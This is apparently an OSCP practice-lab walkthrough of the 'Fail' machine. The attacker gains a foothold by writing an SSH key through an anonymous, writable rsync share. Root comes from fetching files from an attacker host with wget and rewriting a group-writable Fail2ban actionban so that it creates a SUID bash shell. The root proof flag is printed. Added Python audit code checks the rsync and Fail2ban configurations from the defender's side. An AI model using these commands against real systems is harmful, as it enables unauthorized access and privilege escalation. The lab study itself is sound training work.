OSCP Lab -- Fail


Key points (unauthenticated rsync write used to overwrite the SSH public key + Fail2ban privilege escalation)

1. nmap scan

##
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC 192.168.153.126 -p- -Pn --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-12 23:34 EDT
Warning: 192.168.153.126 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.153.126
Host is up (0.14s latency).
Not shown: 64874 closed tcp ports (reset), 659 filtered tcp ports (no-response)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
873/tcp open  rsync   (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.83 seconds


2. user priv

2.1 Reading files via rsync:

##
## Enumerate the shared modules:
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV --script "rsync-list-modules" -p 873 192.168.153.126
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-13 02:37 EDT
Nmap scan report for 192.168.153.126
Host is up (0.23s latency).

PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)
| rsync-list-modules: 
|_  fox                 fox home

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.31 seconds




############
## Enumerate the shared fox directory:
┌──(root㉿kali)-[~/Desktop]
└─# rsync -av --list-only rsync://192.168.153.126/fox
receiving incremental file list
drwxr-xr-x          4,096 2021/01/21 09:21:59 .
lrwxrwxrwx              9 2020/12/03 15:22:42 .bash_history -> /dev/null
-rw-r--r--            220 2019/04/18 00:12:36 .bash_logout
-rw-r--r--          3,526 2019/04/18 00:12:36 .bashrc
-rw-r--r--            807 2019/04/18 00:12:36 .profile

####
## Copy the files to Kali:
┌──(root㉿kali)-[~/Desktop]
└─# rsync -av rsync://192.168.153.126/fox ./fox
receiving incremental file list
created directory ./fox
./
.bash_history -> /dev/null
.bash_logout
.bashrc
.profile

sent 87 bytes  received 4,828 bytes  1,404.29 bytes/sec
total size is 4,562  speedup is 0.93
                                                                                                              
┌──(root㉿kali)-[~/Desktop]
└─# cd fox           
                                                                                                              
┌──(root㉿kali)-[~/Desktop/fox]
└─# tree ./ -al              
./
├── .bash_history -> /dev/null
├── .bash_logout
├── .bashrc
└── .profile

0 directories, 4 files

###################
## The files above contain nothing useful:
############ Try writing a public key

2.2 Generate a key pair and upload the public key via rsync

##
┌──(root㉿kali)-[~/.ssh]
└─# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:wi6MXgWaQG35nP0zkaRVc8+x7Vx17Z6Z3NGa9NyIgjo root@kali
The key's randomart image is:
+---[RSA 3072]----+
| .. .     .o . .+|
|.  +     o  o o B|
|. . + o + .    =+|
| . o * o o    .++|
|  o   + S..  o.BX|
|   o o ..+. . +=*|
|  . + ..  o.     |
| . . .E          |
|  .    .         |
+----[SHA256]-----+

################
##
┌──(root㉿kali)-[~/.ssh]
└─# cat id_rsa.pub >> authorized_keys
                                                                                                              
┌──(root㉿kali)-[~/.ssh]
└─# ls -al
total 32
drwx------  2 root root 4096 Apr 13 03:03 .
drwx------ 27 root root 4096 Apr 13 02:36 ..
-rw-r--r--  1 root root  563 Apr 13 03:03 authorized_keys
-rw-------  1 root root 2590 Apr 13 02:58 id_rsa
-rw-r--r--  1 root root  563 Apr 13 02:58 id_rsa.pub
-rw-------  1 root root 4458 Apr 13 03:02 known_hosts
-rw-------  1 root root 3952 Apr 12 04:17 known_hosts.old

###
## Upload the public key:
┌──(root㉿kali)-[~/.ssh]
└─# rsync -av /root/.ssh/ rsync://192.168.153.126/fox/.ssh
sending incremental file list
./
authorized_keys
known_hosts

sent 1,132 bytes  received 99 bytes  223.82 bytes/sec
total size is 12,126  speedup is 9.85

###############
# Log in with the private key:
┌──(root㉿kali)-[~/.ssh]
└─# ssh -i id_rsa fox@192.168.153.126                     
Linux fail 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ whoami
fox
$ 
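The foothold above works only because the rsync daemon exports a home directory as a writable, anonymous module. The following audit is an added example, not part of the original writeup, and the two rsyncd.conf bodies are constructed (the box's real configuration is never shown): it parses an rsyncd.conf the way rsyncd does (global settings apply to every module unless overridden) and reports the weak settings beside a hardened version of the same module.

```python
import configparser

# Constructed rsyncd.conf reproducing the exposure on the box: a "fox" module exporting a home
# directory with anonymous write access.
WEAK_RSYNCD_CONF = """
uid = fox
gid = fox

[fox]
    path = /home/fox
    comment = fox home
    read only = no
"""

# Same module with defender-side settings: read-only, authenticated, source-restricted, dedicated path.
HARDENED_RSYNCD_CONF = """
uid = nobody
gid = nogroup

[fox]
    path = /srv/rsync/fox
    comment = fox home
    read only = yes
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/24
"""

def audit_rsyncd(text):
    """Return {module: [findings]} for an rsyncd.conf body; globals act as defaults for every module."""
    cp = configparser.RawConfigParser(default_section="__global__")
    cp.read_string("[__global__]\n" + text)  # settings before the first [module] header are global
    report = {}
    for module in cp.sections():
        issues = []
        # rsyncd modules are read-only unless "read only" is explicitly turned off
        if cp.get(module, "read only", fallback="yes").strip().lower() in ("no", "false", "0"):
            issues.append("module is writable")
        if not cp.has_option(module, "auth users"):
            issues.append("no auth users: anonymous access")
        if not cp.has_option(module, "hosts allow"):
            issues.append("no hosts allow: reachable from any source")
        path = cp.get(module, "path", fallback="")
        if path == "/" or path.startswith("/home/"):
            issues.append("path exports a home directory or the filesystem root")
        if cp.get(module, "uid", fallback="").strip() == "root":
            issues.append("module runs as root")
        report[module] = issues
    return report
```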



3. root priv [Fail2ban privilege escalation]

##
######################
## linpeas enumeration:
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                    
  Group fail2ban:                                                                                                                    
/etc/fail2ban/action.d                                                                                                               
/etc/fail2ban/action.d/firewallcmd-ipset.conf
/etc/fail2ban/action.d/nftables-multiport.conf
/etc/fail2ban/action.d/firewallcmd-multiport.conf
/etc/fail2ban/action.d/mail-whois.conf
/etc/fail2ban/action.d/ufw.conf
#)You_can_write_even_more_files_inside_last_directory

##########################
## Monitor scheduled tasks with pspy64:
fox@fail:/tmp$ wget http://192.168.45.195/pspy64
fox@fail:/tmp$ chmod +x ./pspy64
fox@fail:/tmp$ ./pspy64

## Python3 script run by a scheduled task once a minute:
2024/04/13 03:35:02 CMD: UID=0     PID=14259  | /usr/bin/python3 /usr/bin/fail2ban-server -xf start 

####
## Inspect the script: no write permission on it
fox@fail:/tmp$ ls -l /usr/bin/fail2ban-server
-rwxr-xr-x 1 root root 1419 Sep 23  2018 /usr/bin/fail2ban-server
fox@fail:/tmp$ cat /usr/bin/fail2ban-server
#!/usr/bin/python3
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: t -*-
# vi: set ft=python sts=4 ts=4 sw=4 noet :

# This file is part of Fail2Ban.
#
# Fail2Ban is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Fail2Ban is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Fail2Ban; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

"""
Fail2Ban reads log file that contains password failure report
and bans the corresponding IP addresses using firewall rules.

This tools starts/stops fail2ban server or does client/server communication,
to change/read parameters of the server or jails.

"""

__author__ = "Fail2Ban Developers"
__copyright__ = "Copyright (c) 2004-2008 Cyril Jaquier, 2012-2014 Yaroslav Halchenko, 2014-2016 Serg G. Brester"
__license__ = "GPL"

from fail2ban.client.fail2banserver import exec_command_line, sys

if __name__ == "__main__":
        exec_command_line(sys.argv)



###############
##
fox@fail:/tmp$ id
uid=1000(fox) gid=1001(fox) groups=1001(fox),1000(fail2ban)


####################################
## Modify the config file /etc/fail2ban/action.d/iptables-multiport.conf, the actionban part at the end:
fox@fail:/tmp$ wget http://192.168.45.195/1.txt -O /etc/fail2ban/action.d/iptables-multiport.conf
--2024-04-13 04:24:13--  http://192.168.45.195/1.txt
Connecting to 192.168.45.195:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 498 [text/plain]
Saving to: ‘/etc/fail2ban/action.d/iptables-multiport.conf’

/etc/fail2ban/actio 100%[===================>]     498  --.-KB/s    in 0s      

utime(/etc/fail2ban/action.d/iptables-multiport.conf): Operation not permitted
2024-04-13 04:24:14 (112 MB/s) - ‘/etc/fail2ban/action.d/iptables-multiport.conf’ saved [498/498]
fox@fail:/tmp$ cat /etc/fail2ban/action.d/iptables-multiport.conf
# Fail2Ban configuration file
#
# Author: Cyril Jaquier
# Modified by Yaroslav Halchenko for multiport banning
#

[INCLUDES]

before = iptables-common.conf

[Definition]

# Option:  actionstart
# Notes.:  command executed once at the start of Fail2Ban.
# Values:  CMD
#
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
              <iptables> -I <chain> -p <protocol> -m multiport --dports <port> 
actionban = cp /bin/bash /tmp && chmod 4755 /tmp/bash
fox@fail:/tmp$ ls -al
total 3880
drwxrwxrwt  9 root root    4096 Apr 13 03:31 .
drwxr-xr-x 18 root root    4096 Nov 19  2020 ..
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .font-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .ICE-unix
-rwxr-xr-x  1 fox  fox   830030 Jun  8  2023 linpeas.sh
-rwxr-xr-x  1 fox  fox  3104768 Oct 15 16:07 pspy64
drwx------  3 root root    4096 Mar 23 05:54 systemd-private-ed6103b5cc954113b252ce1682f5f3f9-systemd-timesyncd.service-YHAVrn
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .Test-unix
drwx------  2 root root    4096 Mar 23 05:54 vmware-root_307-2117352714
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .X11-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .XIM-unix
fox@fail:/tmp$ ls -al
total 5024
drwxrwxrwt  9 root root    4096 Apr 13 04:25 .
drwxr-xr-x 18 root root    4096 Nov 19  2020 ..
-rwsr-xr-x  1 root root 1168776 Apr 13 04:26 bash
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .font-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .ICE-unix
-rwxr-xr-x  1 fox  fox   830030 Jun  8  2023 linpeas.sh
-rwxr-xr-x  1 fox  fox  3104768 Oct 15 16:07 pspy64
drwx------  3 root root    4096 Mar 23 05:54 systemd-private-ed6103b5cc954113b252ce1682f5f3f9-systemd-timesyncd.service-YHAVrn
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .Test-unix
drwx------  2 root root    4096 Mar 23 05:54 vmware-root_307-2117352714
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .X11-unix
drwxrwxrwt  2 root root    4096 Mar 23 05:54 .XIM-unix
fox@fail:/tmp$ ./bash -p
bash-5.0# id
uid=1000(fox) gid=1001(fox) euid=0(root) groups=1001(fox),1000(fail2ban)
bash-5.0# cat /root/proof.txt
67881fb0ba414792fb7abf861095ea55
bash-5.0# 

Fail2ban privilege escalation:
Use hydra to generate failed logins so that Fail2Ban bans the IP, which triggers execution of the actionban command:
Got a root shell.
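The root shell comes from a group-writable action.d directory: anyone in the fail2ban group can replace the actionban command, and fail2ban-server runs it as root on the next ban. The check below is an added example, not code from the writeup or from Fail2ban: it reads an action file with the same INI dialect Fail2ban uses, flags action commands that do not call a firewall tool, and reports group- or world-writable action files. The sample text is the tampered file shown above; ALLOWED_PREFIXES is an assumption about how legitimate iptables/nftables actions begin.

```python
import configparser
import os
import stat
import tempfile

# Sample input: the tampered action file from the walkthrough above (constructed copy).
TAMPERED_ACTION = """[INCLUDES]
before = iptables-common.conf

[Definition]
actionstart = <iptables> -N f2b-<name>
              <iptables> -A f2b-<name> -j <returntype>
              <iptables> -I <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
actionban = cp /bin/bash /tmp && chmod 4755 /tmp/bash
"""

# Assumption: legitimate iptables/nftables actions start every command with one of these.
ALLOWED_PREFIXES = ("<iptables>", "<nftables>", "iptables", "ip6tables", "nft ", "firewall-cmd")

ACTION_OPTIONS = ("actionstart", "actionstop", "actioncheck", "actionban", "actionunban")

def suspicious_actions(text):
    """Return (option, command) pairs whose command does not start with an allowed firewall tool."""
    cp = configparser.RawConfigParser()  # no %-interpolation, like Fail2ban's own reader
    cp.read_string(text)
    findings = []
    for opt in ACTION_OPTIONS:
        if not cp.has_option("Definition", opt):
            continue
        # indented continuation lines come back as one value separated by newlines
        for line in cp.get("Definition", opt).splitlines():
            cmd = line.strip()
            if cmd and not cmd.startswith(ALLOWED_PREFIXES):
                findings.append((opt, cmd))
    return findings

def writable_by_group_or_world(path):
    """True if the group or other write bit is set; group write is what let fox edit action.d here."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_demo(mode=0o664):
    """Write the sample to a temp file with the given mode and audit it; returns (findings, writable)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "iptables-multiport.conf")
        with open(path, "w") as f:
            f.write(TAMPERED_ACTION)
        os.chmod(path, mode)  # 0o664 reproduces the group-writable state linpeas reported
        return suspicious_actions(TAMPERED_ACTION), writable_by_group_or_world(path)
```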

4. Summary:

## pentesting-rsync
https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync
## writeup:
https://dylanrholloway.com/proving-grounds-fail-write-up/
## fail2ban privilege escalation:
https://juggernaut-sec.com/fail2ban-lpe/
